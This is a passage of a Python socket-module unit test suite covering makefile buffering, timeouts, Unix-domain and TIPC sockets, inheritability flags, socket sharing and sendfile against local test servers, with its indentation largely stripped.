# The file returned by makefile should keep the socket open...
self.cli_conn.close()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, self.read_msg)
# ...until the file is itself closed
self.read_file.close()
self.assertRaises(OSError, self.cli_conn.recv, 1024)
def _testMakefileClose(self):
self.write_file.write(self.write_msg)
self.write_file.flush()
def testMakefileCloseSocketDestroy(self):
refcount_before = sys.getrefcount(self.cli_conn)
self.read_file.close()
refcount_after = sys.getrefcount(self.cli_conn)
self.assertEqual(refcount_before - 1, refcount_after)
def _testMakefileCloseSocketDestroy(self):
pass
# Non-blocking ops
# NOTE: to set `read_file` as non-blocking, we must call
# `cli_conn.setblocking` and vice-versa (see setUp / clientSetUp).
def testSmallReadNonBlocking(self):
self.cli_conn.setblocking(False)
self.assertEqual(self.read_file.readinto(bytearray(10)), None)
self.assertEqual(self.read_file.read(len(self.read_msg) - 3), None)
self.evt1.set()
self.evt2.wait(1.0)
first_seg = self.read_file.read(len(self.read_msg) - 3)
if first_seg is None:
# Data has not arrived yet (can happen under Windows); wait a bit
time.sleep(0.5)
first_seg = self.read_file.read(len(self.read_msg) - 3)
buf = bytearray(10)
n = self.read_file.readinto(buf)
self.assertEqual(n, 3)
msg = first_seg + buf[:n]
self.assertEqual(msg, self.read_msg)
self.assertEqual(self.read_file.readinto(bytearray(16)), None)
self.assertEqual(self.read_file.read(1), None)
def _testSmallReadNonBlocking(self):
self.evt1.wait(1.0)
self.write_file.write(self.write_msg)
self.write_file.flush()
self.evt2.set()
# Avoid closing the socket before the server test has finished,
# otherwise system recv() will return 0 instead of EWOULDBLOCK.
self.serv_finished.wait(5.0)
def testWriteNonBlocking(self):
self.cli_finished.wait(5.0)
# The client thread can't skip directly - the SkipTest exception
# would appear as a failure.
if self.serv_skipped:
self.skipTest(self.serv_skipped)
def _testWriteNonBlocking(self):
self.serv_skipped = None
self.serv_conn.setblocking(False)
# Try to saturate the socket buffer pipe with repeated large writes.
BIG = b"x" * support.SOCK_MAX_SIZE
LIMIT = 10
# The first write() succeeds since a chunk of data can be buffered
n = self.write_file.write(BIG)
self.assertGreater(n, 0)
for i in range(LIMIT):
n = self.write_file.write(BIG)
if n is None:
# Succeeded
break
self.assertGreater(n, 0)
else:
# Let us know that this test didn't manage to establish
# the expected conditions. This is not a failure in itself but,
# if it happens repeatedly, the test should be fixed.
self.serv_skipped = "failed to saturate the socket buffer"
class LineBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 1 # Default-buffered for reading; line-buffered for writing
class SmallBufferedFileObjectClassTestCase(FileObjectClassTestCase):
bufsize = 2 # Exercise the buffering code
class UnicodeReadFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'wb'
write_msg = MSG
newline = ''
class UnicodeWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'rb'
read_msg = MSG
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class UnicodeReadWriteFileObjectClassTestCase(FileObjectClassTestCase):
"""Tests for socket.makefile() in text mode (rather than binary)"""
read_mode = 'r'
read_msg = MSG.decode('utf-8')
write_mode = 'w'
write_msg = MSG.decode('utf-8')
newline = ''
class NetworkConnectionTest(object):
"""Prove network connection."""
def clientSetUp(self):
# We're inherited below by BasicTCPTest2, which also inherits
# BasicTCPTest, which defines self.port referenced below.
self.cli = socket.create_connection((HOST, self.port))
self.serv_conn = self.cli
class BasicTCPTest2(NetworkConnectionTest, BasicTCPTest):
"""Tests that NetworkConnection does not break existing TCP functionality.
"""
class NetworkConnectionNoServer(unittest.TestCase):
class MockSocket(socket.socket):
def connect(self, *args):
raise socket.timeout('timed out')
@contextlib.contextmanager
def mocked_socket_module(self):
"""Return a socket which times out on connect"""
old_socket = socket.socket
socket.socket = self.MockSocket
try:
yield
finally:
socket.socket = old_socket
def test_connect(self):
port = support.find_unused_port()
cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(cli.close)
with self.assertRaises(OSError) as cm:
cli.connect((HOST, port))
self.assertEqual(cm.exception.errno, errno.ECONNREFUSED)
def test_create_connection(self):
# Issue #9792: errors raised by create_connection() should have
# a proper errno attribute.
port = support.find_unused_port()
with self.assertRaises(OSError) as cm:
socket.create_connection((HOST, port))
# Issue #16257: create_connection() calls getaddrinfo() against
# 'localhost'. This may result in an IPV6 addr being returned
# as well as an IPV4 one:
# >>> socket.getaddrinfo('localhost', port, 0, SOCK_STREAM)
# >>> [(2, 2, 0, '', ('127.0.0.1', 41230)),
# (26, 2, 0, '', ('::1', 41230, 0, 0))]
#
# create_connection() enumerates through all the addresses returned
# and if it doesn't successfully bind to any of them, it propagates
# the last exception it encountered.
#
# On Solaris, ENETUNREACH is returned in this circumstance instead
# of ECONNREFUSED. So, if that errno exists, add it to our list of
# expected errnos.
expected_errnos = [ errno.ECONNREFUSED, ]
if hasattr(errno, 'ENETUNREACH'):
expected_errnos.append(errno.ENETUNREACH)
self.assertIn(cm.exception.errno, expected_errnos)
def test_create_connection_timeout(self):
# Issue #9792: create_connection() should not recast timeout errors
# as generic socket errors.
with self.mocked_socket_module():
with self.assertRaises(socket.timeout):
socket.create_connection((HOST, 1234))
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionAttributesTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.source_port = support.find_unused_port()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def _justAccept(self):
conn, addr = self.serv.accept()
conn.close()
testFamily = _justAccept
def _testFamily(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.family, 2)
testSourceAddress = _justAccept
def _testSourceAddress(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30,
source_address=('', self.source_port))
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.getsockname()[1], self.source_port)
# The port number being used is sufficient to show that the bind()
# call happened.
testTimeoutDefault = _justAccept
def _testTimeoutDefault(self):
# passing no explicit timeout uses socket's global default
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(42)
try:
self.cli = socket.create_connection((HOST, self.port))
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), 42)
testTimeoutNone = _justAccept
def _testTimeoutNone(self):
# None timeout means the same as sock.settimeout(None)
self.assertTrue(socket.getdefaulttimeout() is None)
socket.setdefaulttimeout(30)
try:
self.cli = socket.create_connection((HOST, self.port), timeout=None)
self.addCleanup(self.cli.close)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(self.cli.gettimeout(), None)
testTimeoutValueNamed = _justAccept
def _testTimeoutValueNamed(self):
self.cli = socket.create_connection((HOST, self.port), timeout=30)
self.assertEqual(self.cli.gettimeout(), 30)
testTimeoutValueNonamed = _justAccept
def _testTimeoutValueNonamed(self):
self.cli = socket.create_connection((HOST, self.port), 30)
self.addCleanup(self.cli.close)
self.assertEqual(self.cli.gettimeout(), 30)
@unittest.skipUnless(thread, 'Threading required for this test.')
class NetworkConnectionBehaviourTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
def testInsideTimeout(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
time.sleep(3)
conn.send(b"done!")
testOutsideTimeout = testInsideTimeout
def _testInsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port))
data = sock.recv(5)
self.assertEqual(data, b"done!")
def _testOutsideTimeout(self):
self.cli = sock = socket.create_connection((HOST, self.port), timeout=1)
self.assertRaises(socket.timeout, lambda: sock.recv(5))
class TCPTimeoutTest(SocketTCPTest):
def testTCPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.accept()
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (TCP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of error (TCP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (TCP)")
if not ok:
self.fail("accept() returned success when we did not expect it")
@unittest.skipUnless(hasattr(signal, 'alarm'),
'test needs signal.alarm()')
def testInterruptedTimeout(self):
# XXX I don't know how to do this test on MSWindows or any other
# platform that doesn't support signal.alarm() or os.kill(), though
# the bug should have existed on all platforms.
self.serv.settimeout(5.0) # must be longer than alarm
class Alarm(Exception):
pass
def alarm_handler(signal, frame):
raise Alarm
old_alarm = signal.signal(signal.SIGALRM, alarm_handler)
try:
signal.alarm(2) # POSIX allows alarm to be up to 1 second early
try:
foo = self.serv.accept()
except socket.timeout:
self.fail("caught timeout instead of Alarm")
except Alarm:
pass
except:
self.fail("caught other exception instead of Alarm:"
" %s(%s):\n%s" %
(sys.exc_info()[:2] + (traceback.format_exc(),)))
else:
self.fail("nothing caught")
finally:
signal.alarm(0) # shut off alarm
except Alarm:
self.fail("got Alarm in wrong place")
finally:
# no alarm can be pending. Safe to restore old handler.
signal.signal(signal.SIGALRM, old_alarm)
class UDPTimeoutTest(SocketUDPTest):
def testUDPTimeout(self):
def raise_timeout(*args, **kwargs):
self.serv.settimeout(1.0)
self.serv.recv(1024)
self.assertRaises(socket.timeout, raise_timeout,
"Error generating a timeout exception (UDP)")
def testTimeoutZero(self):
ok = False
try:
self.serv.settimeout(0.0)
foo = self.serv.recv(1024)
except socket.timeout:
self.fail("caught timeout instead of error (UDP)")
except OSError:
ok = True
except:
self.fail("caught unexpected exception (UDP)")
if not ok:
self.fail("recv() returned success when we did not expect it")
class TestExceptions(unittest.TestCase):
def testExceptionTree(self):
self.assertTrue(issubclass(OSError, Exception))
self.assertTrue(issubclass(socket.herror, OSError))
self.assertTrue(issubclass(socket.gaierror, OSError))
self.assertTrue(issubclass(socket.timeout, OSError))
@unittest.skipUnless(sys.platform == 'linux', 'Linux specific test')
class TestLinuxAbstractNamespace(unittest.TestCase):
UNIX_PATH_MAX = 108
def testLinuxAbstractNamespace(self):
address = b"\x00python-test-hello\x00\xff"
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s1:
s1.bind(address)
s1.listen()
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s2:
s2.connect(s1.getsockname())
with s1.accept()[0] as s3:
self.assertEqual(s1.getsockname(), address)
self.assertEqual(s2.getpeername(), address)
def testMaxName(self):
address = b"\x00" + b"h" * (self.UNIX_PATH_MAX - 1)
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(address)
self.assertEqual(s.getsockname(), address)
def testNameOverflow(self):
address = "\x00" + "h" * self.UNIX_PATH_MAX
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
self.assertRaises(OSError, s.bind, address)
def testStrName(self):
# Check that an abstract name can be passed as a string.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
try:
s.bind("\x00python\x00test\x00")
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
finally:
s.close()
def testBytearrayName(self):
# Check that an abstract name can be passed as a bytearray.
with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
s.bind(bytearray(b"\x00python\x00test\x00"))
self.assertEqual(s.getsockname(), b"\x00python\x00test\x00")
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'), 'test needs socket.AF_UNIX')
class TestUnixDomain(unittest.TestCase):
def setUp(self):
self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
def tearDown(self):
self.sock.close()
def encoded(self, path):
# Return the given path encoded in the file system encoding,
# or skip the test if this is not possible.
try:
return os.fsencode(path)
except UnicodeEncodeError:
self.skipTest(
"Pathname {0!a} cannot be represented in file "
"system encoding {1!r}".format(
path, sys.getfilesystemencoding()))
def bind(self, sock, path):
# Bind the socket
try:
sock.bind(path)
except OSError as e:
if str(e) == "AF_UNIX path too long":
self.skipTest(
"Pathname {0!a} is too long to serve as an AF_UNIX path"
.format(path))
else:
raise
def testStrAddr(self):
# Test binding to and retrieving a normal string pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testBytesAddr(self):
# Test binding to a bytes pathname.
path = os.path.abspath(support.TESTFN)
self.bind(self.sock, self.encoded(path))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testSurrogateescapeBind(self):
# Test binding to a valid non-ASCII pathname, with the
# non-ASCII bytes supplied using surrogateescape encoding.
path = os.path.abspath(support.TESTFN_UNICODE)
b = self.encoded(path)
self.bind(self.sock, b.decode("ascii", "surrogateescape"))
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
def testUnencodableAddr(self):
# Test binding to a pathname that cannot be encoded in the
# file system encoding.
if support.TESTFN_UNENCODABLE is None:
self.skipTest("No unencodable filename available")
path = os.path.abspath(support.TESTFN_UNENCODABLE)
self.bind(self.sock, path)
self.addCleanup(support.unlink, path)
self.assertEqual(self.sock.getsockname(), path)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BufferIOTest(SocketConnectedTest):
"""
Test the buffer versions of socket.recv() and socket.send().
"""
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecvIntoArray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvIntoBytearray(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoBytearray = _testRecvIntoArray
def testRecvIntoMemoryview(self):
buf = bytearray(1024)
nbytes = self.cli_conn.recv_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvIntoMemoryview = _testRecvIntoArray
def testRecvFromIntoArray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
def _testRecvFromIntoArray(self):
buf = bytes(MSG)
self.serv_conn.send(buf)
def testRecvFromIntoBytearray(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(buf)
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoBytearray = _testRecvFromIntoArray
def testRecvFromIntoMemoryview(self):
buf = bytearray(1024)
nbytes, addr = self.cli_conn.recvfrom_into(memoryview(buf))
self.assertEqual(nbytes, len(MSG))
msg = buf[:len(MSG)]
self.assertEqual(msg, MSG)
_testRecvFromIntoMemoryview = _testRecvFromIntoArray
def testRecvFromIntoSmallBuffer(self):
# See issue #20246.
buf = bytearray(8)
self.assertRaises(ValueError, self.cli_conn.recvfrom_into, buf, 1024)
def _testRecvFromIntoSmallBuffer(self):
self.serv_conn.send(MSG)
def testRecvFromIntoEmptyBuffer(self):
buf = bytearray()
self.cli_conn.recvfrom_into(buf)
self.cli_conn.recvfrom_into(buf, 0)
_testRecvFromIntoEmptyBuffer = _testRecvFromIntoArray
TIPC_STYPE = 2000
TIPC_LOWER = 200
TIPC_UPPER = 210
def isTipcAvailable():
"""Check if the TIPC module is loaded
The TIPC module is not loaded automatically on Ubuntu and probably
other Linux distros.
"""
if not hasattr(socket, "AF_TIPC"):
return False
if not os.path.isfile("/proc/modules"):
return False
with open("/proc/modules") as f:
for line in f:
if line.startswith("tipc "):
return True
return False
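# A minimal sketch of the same /proc/modules probe for an arbitrary kernel
# module; is_kernel_module_loaded is a hypothetical helper and is not used by
# the TIPC tests below.
def is_kernel_module_loaded(name):
    """Return True if `name` shows up as a loaded module in /proc/modules."""
    if not os.path.isfile("/proc/modules"):
        return False
    with open("/proc/modules") as f:
        return any(line.startswith(name + " ") for line in f)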
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCTest(unittest.TestCase):
def testRDM(self):
srv = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
cli = socket.socket(socket.AF_TIPC, socket.SOCK_RDM)
self.addCleanup(srv.close)
self.addCleanup(cli.close)
srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
srv.bind(srvaddr)
sendaddr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
cli.sendto(MSG, sendaddr)
msg, recvaddr = srv.recvfrom(1024)
self.assertEqual(cli.getsockname(), recvaddr)
self.assertEqual(msg, MSG)
@unittest.skipUnless(isTipcAvailable(),
"TIPC module is not loaded, please 'sudo modprobe tipc'")
class TIPCThreadableTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName = 'runTest'):
unittest.TestCase.__init__(self, methodName = methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.srv = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.srv.close)
self.srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
srvaddr = (socket.TIPC_ADDR_NAMESEQ, TIPC_STYPE,
TIPC_LOWER, TIPC_UPPER)
self.srv.bind(srvaddr)
self.srv.listen()
self.serverExplicitReady()
self.conn, self.connaddr = self.srv.accept()
self.addCleanup(self.conn.close)
def clientSetUp(self):
# There is a hittable race between serverExplicitReady() and the
# accept() call; sleep a little while to avoid it, otherwise
# we could get an exception
time.sleep(0.1)
self.cli = socket.socket(socket.AF_TIPC, socket.SOCK_STREAM)
self.addCleanup(self.cli.close)
addr = (socket.TIPC_ADDR_NAME, TIPC_STYPE,
TIPC_LOWER + int((TIPC_UPPER - TIPC_LOWER) / 2), 0)
self.cli.connect(addr)
self.cliaddr = self.cli.getsockname()
def testStream(self):
msg = self.conn.recv(1024)
self.assertEqual(msg, MSG)
self.assertEqual(self.cliaddr, self.connaddr)
def _testStream(self):
self.cli.send(MSG)
self.cli.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class ContextManagersTest(ThreadedTCPSocketTest):
def _testSocketClass(self):
# base test
with socket.socket() as sock:
self.assertFalse(sock._closed)
self.assertTrue(sock._closed)
# close inside with block
with socket.socket() as sock:
sock.close()
self.assertTrue(sock._closed)
# exception inside with block
with socket.socket() as sock:
self.assertRaises(OSError, sock.sendall, b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionBase(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionBase(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
self.assertFalse(sock._closed)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
self.assertTrue(sock._closed)
def testCreateConnectionClose(self):
conn, addr = self.serv.accept()
self.addCleanup(conn.close)
data = conn.recv(1024)
conn.sendall(data)
def _testCreateConnectionClose(self):
address = self.serv.getsockname()
with socket.create_connection(address) as sock:
sock.close()
self.assertTrue(sock._closed)
self.assertRaises(OSError, sock.sendall, b'foo')
class InheritanceTest(unittest.TestCase):
@unittest.skipUnless(hasattr(socket, "SOCK_CLOEXEC"),
"SOCK_CLOEXEC not defined")
@support.requires_linux_version(2, 6, 28)
def test_SOCK_CLOEXEC(self):
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_CLOEXEC) as s:
self.assertTrue(s.type & socket.SOCK_CLOEXEC)
self.assertFalse(s.get_inheritable())
def test_default_inheritable(self):
sock = socket.socket()
with sock:
self.assertEqual(sock.get_inheritable(), False)
def test_dup(self):
sock = socket.socket()
with sock:
newsock = sock.dup()
sock.close()
with newsock:
self.assertEqual(newsock.get_inheritable(), False)
def test_set_inheritable(self):
sock = socket.socket()
with sock:
sock.set_inheritable(True)
self.assertEqual(sock.get_inheritable(), True)
sock.set_inheritable(False)
self.assertEqual(sock.get_inheritable(), False)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_get_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(sock.get_inheritable(), False)
# clear FD_CLOEXEC flag
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
self.assertEqual(sock.get_inheritable(), True)
@unittest.skipIf(fcntl is None, "need fcntl")
def test_set_inheritable_cloexec(self):
sock = socket.socket()
with sock:
fd = sock.fileno()
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
fcntl.FD_CLOEXEC)
sock.set_inheritable(True)
self.assertEqual(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC,
0)
@unittest.skipUnless(hasattr(socket, "socketpair"),
"need socket.socketpair()")
def test_socketpair(self):
s1, s2 = socket.socketpair()
self.addCleanup(s1.close)
self.addCleanup(s2.close)
self.assertEqual(s1.get_inheritable(), False)
self.assertEqual(s2.get_inheritable(), False)
@unittest.skipUnless(hasattr(socket, "SOCK_NONBLOCK"),
"SOCK_NONBLOCK not defined")
class NonblockConstantTest(unittest.TestCase):
def checkNonblock(self, s, nonblock=True, timeout=0.0):
if nonblock:
self.assertTrue(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), timeout)
else:
self.assertFalse(s.type & socket.SOCK_NONBLOCK)
self.assertEqual(s.gettimeout(), None)
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(1)
self.checkNonblock(s, False)
s.setblocking(0)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(1)
self.checkNonblock(s, False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
# socket sharing is expected to work only for blocking sockets
# since the internal python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
# If the user specified "0" for proto, then
# internally windows will have picked the correct value.
# Python introspection on the socket however will still return
# 0. For the shared socket, the python value is recreated
# from the actual value, so it may not compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10MB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = 2
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
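# e.g. list(chunks(10, 4)) == [4, 4, 2]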
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(self.TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run, return either the send()
# or the sendfile() based implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non-blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
